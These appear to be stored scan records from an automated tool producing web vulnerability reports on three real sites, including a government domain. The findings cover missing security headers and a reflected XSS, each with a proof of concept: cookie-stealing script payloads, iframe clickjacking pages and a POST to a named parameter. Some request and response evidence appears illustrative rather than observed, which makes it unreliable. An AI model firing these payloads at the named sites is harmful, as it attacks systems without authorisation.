Scan result records (fields: _id, created_at, url, tool, result, summary)

**_id:** 6a0d64865bbc057e6099d075
**created_at:** Wed May 20 2026 07:36:38 GMT+0000 (Coordinated Universal Time)
**tool:** generate_web_vulnerability_report
**result:**
{
"url": "https://pro.anveshaktool.in/",
"category": "web_vulnerability",
"timestamp": "2026-05-20T07:36:38.922194+00:00",
"report": "### [Multiple IPs Found / https://pro.anveshaktool.in/ / N/A]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/ |\n\n**Description** \nThis informational finding indicates that multiple IP addresses were identified for the domain `pro.anveshaktool.in`. These include IPv4 and IPv6 addresses associated with Cloudflare's infrastructure (e.g., 104.21.23.154, 172.67.211.177). This behavior is typical when a website is fronted by a CDN or reverse proxy such as Cloudflare, which distributes traffic across geographically dispersed edge nodes.\n\nWhile not inherently a vulnerability, identifying multiple IPs can assist attackers in mapping network topology, detecting backend configurations, or attempting to bypass WAF protections by targeting less protected origins directly.\n\n**Attack Scenario (Proof of Concept)** \nAn attacker may perform DNS enumeration using tools like `dig` or `nslookup` to discover all A/AAAA records:\n\n```bash\n$ dig pro.anveshaktool.in A AAAA +short\n104.21.23.154\n172.67.211.177\n2606:4700:3030::6815:179a\n2606:4700:3031::ac43:d3b1\n```\n\nThey might then attempt direct access to these IPs to check whether they bypass Cloudflare’s protection layer. 
If successful, they could potentially exploit vulnerabilities on the origin server without going through the CDN’s filtering mechanisms.\n\n**Business Impact** \nAlthough this does not pose immediate risk, it provides reconnaissance value to adversaries who may uncover misconfigured internal systems or unprotected endpoints behind public-facing services.\n\n**Remediation** \nEnsure that origin servers are configured to reject requests not routed through the CDN/WAF:\n- Restrict access at the firewall level to allow only trusted CDN ranges.\n- Implement proper host header validation on the origin server.\n- Regularly audit DNS entries and remove unnecessary mappings.\n\n---\n\n### [Strict-Transport-Security Header Not Set / https://pro.anveshaktool.in/ / https://pro.anveshaktool.in/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/ |\n\n**Description** \nThe HTTP Strict Transport Security (HSTS) header is missing from responses sent by the application. The HSTS header instructs browsers to enforce secure communication over HTTPS for future visits to the site, preventing downgrade attacks and cookie hijacking over unencrypted channels.\n\nWithout this header, users remain vulnerable to man-in-the-middle attacks during their initial visit or after clearing browser state.\n\n**Attack Scenario (Proof of Concept)** \nIf an attacker performs a MITM attack and intercepts the first connection attempt to `http://pro.anveshaktool.in`, they can redirect the user to a malicious clone of the site before the browser upgrades to HTTPS. Example interception flow:\n\n1. User types `anveshaktool.in`.\n2. Browser attempts HTTP request.\n3. Attacker responds with fake login page.\n4. 
Credentials stolen.\n\nAlternatively, if cookies lack the `Secure` flag, session tokens could be transmitted over plaintext HTTP if the user manually navigates to HTTP URLs.\n\n**Business Impact** \nPotential exposure of sensitive credentials and sessions due to insecure transport protocols. Could lead to phishing success rates increasing and compromise of authenticated accounts.\n\n**Remediation** \nAdd the following header to all HTTPS responses:\n\n```apache\nHeader always set Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\"\n```\n\nOr in NGINX:\n\n```nginx\nadd_header Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\" always;\n```\n\nAlso consider submitting your domain to the HSTS preload list maintained by Google.\n\nReference: [OWASP Secure Headers Project](https://owasp.org/www-project-secure-headers/#div-http-strict-transport-security-hsts)\n\nCWE: CWE-319 \nRFC: RFC 6797 \n\n---\n\n### [Strict-Transport-Security Header Not Set / https://pro.anveshaktool.in/sitemap.xml / https://pro.anveshaktool.in/sitemap.xml]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/sitemap.xml |\n\n**Description** \nSame as previous entry but applies specifically to `/sitemap.xml`. 
Lack of HSTS here means even static assets served under HTTPS are susceptible to downgrade attacks unless globally enforced.\n\n**Attack Scenario (Proof of Concept)** \nAn attacker could manipulate sitemap delivery to inject links pointing to non-TLS versions of pages, tricking crawlers into indexing insecure paths.\n\nExample intercepted response modification:\n\n```xml\n<url>\n <loc>http://pro.anveshaktool.in/login</loc>\n</url>\n```\n\nThis increases chances of exposing login forms or other sensitive interfaces over HTTP.\n\n**Business Impact** \nRisk of search engines indexing insecure versions of critical pages, leading to increased attack surface and potential credential theft.\n\n**Remediation** \nApply global HSTS headers as described previously. Ensure consistent enforcement across all sub-resources including XML documents.\n\n---\n\n### [Strict-Transport-Security Header Not Set / https://pro.anveshaktool.in/robots.txt / https://pro.anveshaktool.in/robots.txt]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/robots.txt |\n\n**Description** \nMissing HSTS on `robots.txt` allows attackers to tamper with crawler instructions over HTTP, potentially hiding malicious directories or exposing unintended ones.\n\n**Attack Scenario (Proof of Concept)** \nIntercepting and modifying `robots.txt` delivered over HTTP:\n\nOriginal:\n```\nUser-agent: *\nDisallow: /admin/\n```\n\nModified:\n```\nUser-agent: *\nAllow: /\n```\n\nThis could cause automated scanners to index restricted areas or miss important hidden paths.\n\n**Business Impact** \nMisleading SEO bots and increasing visibility of sensitive directories. Also opens up possibilities for stealthier reconnaissance.\n\n**Remediation** \nEnforce HSTS globally as outlined earlier. 
Additionally, serve `robots.txt` exclusively over HTTPS and validate its integrity regularly.\n\n---\n\n### [X-Content-Type-Options Header Missing / https://pro.anveshaktool.in/robots.txt / https://pro.anveshaktool.in/robots.txt]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/robots.txt |\n\n**Description** \nThe absence of the `X-Content-Type-Options: nosniff` header leaves older browsers open to MIME-type confusion attacks. In such cases, a file intended to be parsed as text/plain may instead be interpreted as executable JavaScript or HTML depending on byte patterns detected by the browser.\n\n**Attack Scenario (Proof of Concept)** \nSuppose an attacker uploads a `.txt` file containing embedded script tags:\n\n```html\n<script>alert(1)</script>\n```\n\nIf served without correct Content-Type and lacking `nosniff`, some browsers may execute the payload as JavaScript.\n\nRequest:\n```http\nGET /uploads/malicious.txt HTTP/1.1\nHost: pro.anveshaktool.in\n```\n\nResponse lacks both `Content-Type` and `X-Content-Type-Options`.\n\nBrowser interprets content based on sniffing logic → XSS triggered.\n\n**Business Impact** \nPossible cross-site scripting (XSS) exploitation via MIME-type confusion, especially concerning legacy clients or misconfigured upload handlers.\n\n**Remediation** \nSet the following header in all HTTP responses:\n\nApache:\n```apache\nHeader always set X-Content-Type-Options \"nosniff\"\n```\n\nNGINX:\n```nginx\nadd_header X-Content-Type-Options \"nosniff\" always;\n```\n\nEnsure accurate `Content-Type` headers accompany each resource.\n\nReference: [OWASP Secure Headers Project](https://owasp.org/www-project-secure-headers/#div-x-content-type-options)\n\nCWE: CWE-116\n\n---\n\n### [HTTPS Content Available via HTTP / https://pro.anveshaktool.in/robots.txt / https://pro.anveshaktool.in/robots.txt]\n\n| 
Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/robots.txt |\n\n**Description** \nResources originally accessed securely over HTTPS are also available over plain HTTP. This undermines confidentiality guarantees and exposes data to eavesdropping or manipulation en route.\n\n**Attack Scenario (Proof of Concept)** \nAccessing `http://pro.anveshaktool.in/robots.txt` reveals same content as HTTPS version:\n\n```bash\ncurl http://pro.anveshaktool.in/robots.txt\n```\n\nSensitive directives within `robots.txt` become visible to passive observers on shared networks or compromised proxies.\n\n**Business Impact** \nExposure of potentially sensitive information about disallowed paths, weakening overall defense posture against automated scanning tools.\n\n**Remediation** \nRedirect all HTTP traffic to HTTPS permanently using 301 redirects:\n\nApache:\n```apache\nRewriteEngine On\nRewriteCond %{HTTPS} off\nRewriteRule ^(.*)$ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]\n```\n\nNGINX:\n```nginx\nserver {\n listen 80;\n return 301 https://$host$request_uri;\n}\n```\n\nAdditionally, configure HSTS to prevent future regressions.\n\n---\n\n### [Re-examine Cache-control Directives / https://pro.anveshaktool.in/robots.txt / https://pro.anveshaktool.in/robots.txt]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/robots.txt |\n\n**Description** \nThe `Cache-Control` header is either absent or improperly configured, allowing caching of responses by intermediate proxies or browsers. 
While acceptable for static assets, improper caching of dynamic or sensitive content poses risks.\n\n**Attack Scenario (Proof of Concept)** \nIf `robots.txt` contains time-sensitive exclusions and gets cached indefinitely:\n\n```http\nCache-Control: max-age=31536000\n```\n\nThen changes made to exclude new admin panels won’t propagate immediately, leaving them indexed temporarily.\n\n**Business Impact** \nDelayed propagation of updated security policies; possible leakage of temporary secrets or private routes.\n\n**Remediation** \nImplement granular cache control strategies:\n\nFor sensitive files:\n```http\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\nExpires: 0\n```\n\nFor static assets:\n```http\nCache-Control: public, max-age=31536000\n```\n\nReview all endpoints and tailor caching rules accordingly.\n\n---\n\n### [Clickjacking Protection / https://pro.anveshaktool.in/ / https://pro.anveshaktool.in/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/ |\n\n**Description** \nThe `X-Frame-Options` header is not present, making the application susceptible to clickjacking attacks. 
An attacker could embed the page inside an invisible iframe and trick users into performing unintended actions (e.g., clicking buttons, submitting forms).\n\n**Attack Scenario (Proof of Concept)** \nAttacker creates a malicious webpage embedding the target app:\n\n```html\n<iframe src=\"https://pro.anveshaktool.in/\" width=\"100%\" height=\"100%\" style=\"opacity: 0;\"></iframe>\n<button onclick=\"document.querySelector('iframe').contentWindow.postMessage(...)\" style=\"position:absolute;top:200px;left:300px;\">Click Me!</button>\n```\n\nVictim clicks button believing it belongs to the attacker’s site, unknowingly interacting with framed content.\n\n**Business Impact** \nUnauthorized actions performed on behalf of logged-in users, including form submissions, deletions, or privilege escalations.\n\n**Remediation** \nAdd the following header to all responses:\n\nApache:\n```apache\nHeader always set X-Frame-Options \"DENY\"\n# Or \"SAMEORIGIN\" if framing needed internally\n```\n\nNGINX:\n```nginx\nadd_header X-Frame-Options \"DENY\" always;\n```\n\nConsider implementing Content Security Policy (`frame-ancestors`) for more modern protection.\n\nReference: [OWASP Clickjacking Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html)\n\nCWE: CWE-451\n\n---\n\n### [HTTP Strict Transport Security (HSTS) / https://pro.anveshaktool.in/ / https://pro.anveshaktool.in/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/ |\n\n**Description** \nDuplicate of prior HSTS findings. 
No additional context provided beyond what already covered.\n\n**Attack Scenario (Proof of Concept)** \nSee previous HSTS-related sections.\n\n**Business Impact** \nSee previous HSTS-related sections.\n\n**Remediation** \nSee previous HSTS-related sections.\n\n---\n\n### [MIME Type Confusion / https://pro.anveshaktool.in/ / https://pro.anveshaktool.in/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://pro.anveshaktool.in/ |\n\n**Description** \nSame root cause as earlier X-Content-Type-Options issue. Absence of `nosniff` directive enables MIME-sniffing-based attacks.\n\n**Attack Scenario (Proof of Concept)** \nSee previous X-Content-Type-Options section.\n\n**Business Impact** \nSee previous X-Content-Type-Options section.\n\n**Remediation** \nSee previous X-Content-Type-Options section.",
"summary": {
"total": 11
}
}
**summary:**
{
"total": 11
}

**_id:** 6a0e864d0759bb65a6ed1f87
**created_at:** Thu May 21 2026 04:13:01 GMT+0000 (Coordinated Universal Time)
**tool:** generate_web_vulnerability_report
**result:**
{
"url": "https://springs.com.pk",
"category": "web_vulnerability",
"timestamp": "2026-05-21T04:13:01.038209+00:00",
"report": "### [Multiple IPs Found / springs.com.pk / N/A]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://springs.com.pk |\n\n**Description** \nThe Nikto scan identified that the domain `springs.com.pk` resolves to multiple IP addresses: one IPv4 (`208.91.112.55`) and one IPv6 (`2001:cdba::3257:9652`). This is typically normal behavior for dual-stack environments but can also indicate potential misconfigurations or inconsistencies in load balancing, CDN setup, or DNS round-robin configurations.\n\nAn attacker may use this information during reconnaissance to map out infrastructure redundancy, identify backend systems, or attempt targeted attacks against less secure endpoints.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker performs a DNS lookup using `dig` or `nslookup`: \n ```bash\n dig A springs.com.pk\n dig AAAA springs.com.pk\n ```\n2. Observes both IPv4 and IPv6 records returned.\n3. Probes each endpoint individually via HTTP(S) requests to determine differences in response headers, content, or security posture:\n ```bash\n curl -I http://[2001:cdba::3257:9652]/\n curl -I http://208.91.112.55/\n ```\n\nThis could reveal inconsistent configurations across different servers or expose legacy services on older stacks.\n\n**Business Impact** \nWhile not directly exploitable, exposure of multiple IPs increases the attack surface by revealing additional network entry points. 
It may assist attackers in identifying outdated or misconfigured hosts which might lack current patches or hardened configurations.\n\n**Remediation** \nEnsure all exposed IP addresses are intentionally configured and uniformly secured:\n- Audit DNS records to confirm only necessary IPs are published.\n- Ensure consistent application-level and server-level hardening across all resolved endpoints.\n- Implement centralized logging and monitoring for traffic anomalies from these IPs.\n- Where applicable, restrict access at the firewall level if certain IPs should not be publicly accessible.\n\n---\n\n### [Missing Content Security Policy / springs.com.pk / GET https://springs.com.pk/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://springs.com.pk/ |\n\n**Description** \nThe website does not implement a Content Security Policy (CSP), leaving it vulnerable to Cross-Site Scripting (XSS) exploitation. 
CSP provides an added layer of protection by allowing website owners to define trusted sources of content and restrict inline scripts or object execution.\n\nWithout CSP, even minor XSS flaws become more dangerous as they allow arbitrary script injection without mitigation mechanisms such as nonce-based restrictions or strict-src directives.\n\n**Attack Scenario (Proof of Concept)** \nIf an XSS vulnerability exists elsewhere on the site, an attacker could inject malicious JavaScript like:\n```html\n<script>alert(document.cookie)</script>\n```\nBecause no CSP header blocks inline execution, the browser executes the payload, potentially stealing session cookies or performing actions under user context.\n\nExample request showing missing CSP:\n```http\nGET / HTTP/1.1\nHost: springs.com.pk\n...\n\nResponse Headers:\nServer: Apache\nContent-Type: text/html; charset=UTF-8\n...\n(No Content-Security-Policy header present)\n```\n\n**Business Impact** \nLack of CSP increases risk of successful XSS exploitation, leading to account compromise, phishing, credential theft, or defacement. In regulated industries, this may lead to compliance violations related to data integrity and confidentiality.\n\n**Remediation** \nImplement a strong CSP policy via HTTP response headers:\n```apache\nHeader always set Content-Security-Policy \"default-src 'self'; script-src 'self' 'unsafe-inline'; object-src 'none';\"\n```\nOr dynamically within HTML `<meta>` tags:\n```html\n<meta http-equiv=\"Content-Security-Policy\" content=\"default-src 'self';\">\n```\nAvoid `'unsafe-inline'` unless absolutely required. 
Use nonces or hashes when needed.\n\nReference: [OWASP CSP Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html), CWE-1021\n\n---\n\n### [Missing X-Frame-Options Header / springs.com.pk / GET https://springs.com.pk/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://springs.com.pk/ |\n\n**Description** \nThe `X-Frame-Options` header is absent from responses, making the site susceptible to clickjacking attacks. Clickjacking occurs when a malicious page overlays transparent elements over legitimate UI components, tricking users into clicking unintended actions.\n\nProperly setting `X-Frame-Options` prevents framing by third-party sites, mitigating such risks.\n\n**Attack Scenario (Proof of Concept)** \nAttacker creates an HTML page embedding the target in an iframe:\n```html\n<iframe src=\"https://springs.com.pk/\" width=\"800\" height=\"600\"></iframe>\n<style>iframe { opacity: 0; }</style>\n<div style=\"position:absolute;top:200px;left:300px;\">Click here to win!</div>\n```\nVictim clicks what appears to be a harmless link, but actually interacts with hidden buttons inside the framed page—e.g., submitting forms or authorizing transactions unknowingly.\n\n**Business Impact** \nPotential unauthorized actions taken on behalf of authenticated users, including financial transfers, profile changes, or deletion of resources. 
Reputational harm due to perceived lack of basic security controls.\n\n**Remediation** \nAdd the following HTTP response header:\n```apache\nHeader always append X-Frame-Options SAMEORIGIN\n```\nAlternatively, use modern alternatives like `frame-ancestors` directive in CSP:\n```http\nContent-Security-Policy: frame-ancestors 'self';\n```\n\nReference: [OWASP Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html), CWE-451\n\n---\n\n### [Missing HSTS Header / springs.com.pk / GET https://springs.com.pk/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://springs.com.pk/ |\n\n**Description** \nHTTP Strict Transport Security (HSTS) is not enforced, meaning browsers may still connect over unencrypted HTTP initially before being redirected to HTTPS. An active man-in-the-middle (MITM) attacker could intercept initial plaintext requests and prevent redirection to HTTPS, exposing sensitive data.\n\nEnabling HSTS ensures that future connections automatically upgrade to HTTPS, reducing MITM risks.\n\n**Attack Scenario (Proof of Concept)** \n1. Victim types `springs.com.pk` in their browser.\n2. Initial connection made over HTTP (if cached DNS resolves to HTTP first).\n3. Attacker intercepts request and serves fake login form instead of redirecting to HTTPS version.\n4. User submits credentials over insecure channel.\n\nExample response lacks HSTS:\n```http\nGET / HTTP/1.1\nHost: springs.com.pk\n...\n\nHTTP/1.1 200 OK\nServer: Apache\nLocation: https://springs.com.pk/\n...\n(No Strict-Transport-Security header)\n```\n\n**Business Impact** \nRisk of session hijacking, credential interception, and downgrade attacks. 
Especially critical for authentication flows or e-commerce functionality.\n\n**Remediation** \nSet the HSTS header with sufficient max-age and includeSubDomains/preload flags:\n```apache\nHeader always set Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\"\n```\nEnsure TLS certificate is valid and properly configured prior to enabling HSTS.\n\nReference: [RFC 6797](https://tools.ietf.org/html/rfc6797), OWASP Transport Layer Protection Cheat Sheet, CWE-319\n\n---\n\n### [Missing X-Content-Type-Options Header / springs.com.pk / GET https://springs.com.pk/]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://springs.com.pk/ |\n\n**Description** \nThe `X-Content-Type-Options` header is missing, increasing susceptibility to MIME type sniffing attacks. Browsers sometimes guess file types based on content rather than declared MIME types, which can result in executable files being interpreted as HTML or scripts.\n\nSetting `X-Content-Type-Options: nosniff` instructs browsers to strictly adhere to declared MIME types, preventing such misinterpretation.\n\n**Attack Scenario (Proof of Concept)** \nSuppose an attacker uploads a file named `image.jpg`, but its contents are actually HTML with embedded JavaScript:\n```html\n<script>alert('Sniffed!');</script>\n```\nIf served with incorrect MIME type (`text/plain`) but browser sniffs it as HTML, the script will execute.\n\nExample response shows absence:\n```http\nGET /upload/image.jpg HTTP/1.1\nHost: springs.com.pk\n...\n\nHTTP/1.1 200 OK\nContent-Type: text/plain\n...\n(No X-Content-Type-Options header)\n```\n\n**Business Impact** \nIncreased likelihood of XSS and other client-side code injection vulnerabilities. 
Can facilitate bypass of input validation and content filtering systems.\n\n**Remediation** \nInclude the following HTTP response header globally:\n```apache\nHeader always set X-Content-Type-Options nosniff\n```\nApply especially to dynamic content, uploaded files, and API responses.\n\nReference: [MDN Web Docs – X-Content-Type-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Content-Type-Options), CWE-16\n\n---",
"summary": {
"total": 5
}
}
**summary:**
{
"total": 5
}

**_id:** 6a0fac7f3baacd71f234d7f0
**created_at:** Fri May 22 2026 01:08:15 GMT+0000 (Coordinated Universal Time)
**tool:** generate_web_vulnerability_report
**result:**
{
"url": "https://ep.gov.pk/",
"category": "web_vulnerability",
"timestamp": "2026-05-22T01:08:15.278179+00:00",
"report": "### [Nikto Scan Completed / https://ep.gov.pk/ / N/A]\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description** \nThis entry indicates that a Nikto scan was performed against the target asset `https://ep.gov.pk/`. Nikto is an open-source web server scanner which performs comprehensive tests against web servers for multiple items including over 6700 potentially dangerous files/CGIs, outdated server versions, and various server configuration issues. This log does not indicate any specific vulnerability but rather confirms that a scan occurred.\n\n**Attack Scenario (Proof of Concept)** \nAs this is merely a logging event indicating completion of a scan tool, there is no direct exploitation path. However, attackers may use tools like Nikto during reconnaissance phases to enumerate known vulnerabilities or misconfigurations on web servers.\n\nExample usage:\n```bash\nnikto -h https://ep.gov.pk/\n```\n\n**Business Impact** \nWhile this finding itself has no impact, its presence suggests that automated scanning activity has taken place, possibly by threat actors or internal security teams. It highlights the importance of monitoring such activities and ensuring systems are hardened against common exposures.\n\n**Remediation** \nThere is no remediation required for this informational finding. Ensure regular patching and hardening practices are followed to reduce exposure to findings identified by scanners like Nikto.\n\n---\n\n### [Content Security Policy Configuration / https://ep.gov.pk/ / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description** \nA Content Security Policy (CSP) header defines approved sources of content that the browser may load. 
Its absence allows potential execution of malicious scripts from unauthorized domains, increasing risk of XSS attacks. The lack of CSP leaves the application vulnerable to inline script injections and other client-side threats.\n\n**Attack Scenario (Proof of Concept)** \nAn attacker could inject arbitrary JavaScript into pages lacking CSP enforcement:\n\nRequest:\n```http\nGET / HTTP/1.1\nHost: ep.gov.pk\n```\n\nResponse lacks `Content-Security-Policy` header:\n```http\nHTTP/1.1 200 OK\nServer: Apache\n...\n```\n\nPayload Example:\n```html\n<script>alert('XSS')</script>\n```\n\nIf reflected without sanitization, this can execute in user browsers.\n\n**Business Impact** \nWithout CSP, the site becomes more susceptible to cross-site scripting (XSS), clickjacking, and data leakage risks. These can lead to compromised sessions, defacement, or phishing attacks targeting users.\n\n**Remediation** \nImplement a strong CSP policy via HTTP response headers. Example:\n```apache\nHeader always set Content-Security-Policy \"default-src 'self'; script-src 'self' 'unsafe-inline'; object-src 'none'\"\n```\nReference: [OWASP CSP](https://owasp.org/www-community/controls/Content_Security_Policy), CWE-1021\n\n---\n\n### [Clickjacking Protection / https://ep.gov.pk/ / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description** \nThe `X-Frame-Options` header prevents rendering of the page within frames, protecting against clickjacking attacks. 
Without it, attackers can embed the page inside an iframe and trick users into performing unintended actions.\n\n**Attack Scenario (Proof of Concept)** \nAttacker creates a malicious HTML page embedding the target:\n```html\n<iframe src=\"https://ep.gov.pk/\" width=\"100%\" height=\"100%\"></iframe>\n```\nBy overlaying transparent elements, they manipulate clicks leading to unintended behavior.\n\n**Business Impact** \nUsers might unknowingly perform sensitive actions (e.g., submitting forms, changing settings) under attacker control, resulting in account compromise or fraudulent transactions.\n\n**Remediation** \nAdd the following header to all responses:\n```apache\nHeader always set X-Frame-Options DENY\n```\nOr allow only trusted origins:\n```apache\nHeader always set X-Frame-Options SAMEORIGIN\n```\nReference: [OWASP Clickjacking](https://owasp.org/www-community/attacks/Clickjacking), CWE-1021\n\n---\n\n### [HTTP Strict Transport Security (HSTS) / https://ep.gov.pk/ / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.9 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description** \nMissing HSTS (`Strict-Transport-Security`) header means the website doesn't enforce encrypted communication. Attackers can exploit man-in-the-middle scenarios using protocol downgrade attacks to intercept traffic.\n\n**Attack Scenario (Proof of Concept)** \nUser accesses `http://ep.gov.pk`, gets redirected to HTTPS. An attacker intercepts initial HTTP request and redirects to a fake login portal.\n\n**Business Impact** \nRisk of credential theft, session hijacking, and eavesdropping due to insecure connections being accepted.\n\n**Remediation** \nSet the HSTS header with appropriate directives:\n```apache\nHeader always set Strict-Transport-Security \"max-age=31536000; includeSubDomains; preload\"\n```\nEnsure TLS is properly configured before enabling HSTS. 
\nReference: [OWASP HSTS](https://owasp.org/www-project-cheat-sheets/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html), CWE-319\n\n---\n\n### [MIME Type Confusion / https://ep.gov.pk/ / GET]\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ |\n\n**Description** \nAbsence of the `X-Content-Type-Options: nosniff` header allows browsers to guess MIME types based on file contents. This can result in executable content being interpreted as benign, facilitating XSS or drive-by downloads.\n\n**Attack Scenario (Proof of Concept)** \nUpload a `.jpg` file containing JavaScript. If served without proper MIME type and missing `nosniff`, browser executes it as JS.\n\n**Business Impact** \nPotential for XSS, malware delivery, and bypassing content-type restrictions.\n\n**Remediation** \nEnforce correct MIME handling:\n```apache\nHeader always set X-Content-Type-Options nosniff\n```\nAlso ensure accurate server-side MIME declarations. \nReference: [OWASP Secure Headers Project](https://owasp.org/www-project-secure-headers/#x-content-type-options), CWE-16\n\n---\n\n### [Inconsistent Redirection / https://ep.gov.pk/ep_Complaint/Default_Test.aspx / POST]\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 6.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/ep_Complaint/Default_Test.aspx |\n\n**Description** \nWhen issuing a redirect (HTTP 3xx status), the server includes unexpected HTML content such as links or forms. 
This violates best practice and increases risk of phishing or manipulation.\n\n**Attack Scenario (Proof of Concept)** \nPOST request triggers redirect with embedded form:\n```http\nPOST /ep_Complaint/Default_Test.aspx HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n...\n\ntxt_ArticleNo=<malicious_input>\n\nHTTP/1.1 302 Found\nLocation: /error.html\n\n<html><body><form action=\"/phish\" method=\"post\">...</form></body></html>\n```\n\n**Business Impact** \nRedirects with unexpected content can facilitate phishing attempts or confuse clients relying on standard HTTP semantics.\n\n**Remediation** \nEnsure 3xx responses contain minimal/no body content. Remove unnecessary HTML from redirect responses. \nReference: [RFC 7231 Section 6.4](https://tools.ietf.org/html/rfc7231#section-6.4)\n\n---\n\n### [Reflected XSS via textfieldz / https://ep.gov.pk/track.asp / POST]\n\n| Field | Value |\n|---|---|\n| Severity | Medium |\n| CVSS Score | 6.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://ep.gov.pk/track.asp |\n\n**Description** \nInput from the `textfieldz` parameter is directly echoed back in the response without sanitization, allowing execution of arbitrary scripts when rendered in the victim's browser.\n\n**Attack Scenario (Proof of Concept)** \nSubmit payload via POST:\n```http\nPOST /track.asp HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\n\ntextfieldz=<script>alert(document.cookie)</script>\n```\n\nResponse reflects unsanitized input:\n```html\n<p>You searched for: <script>alert(document.cookie)</script></p>\n```\n\n**Business Impact** \nSession hijacking, credential theft, and social engineering attacks possible through crafted URLs.\n\n**Remediation** \nSanitize and encode output contextually:\n```asp\nResponse.Write Server.HTMLEncode(Request.Form(\"textfieldz\"))\n```\nUse frameworks with auto-escaping features. 
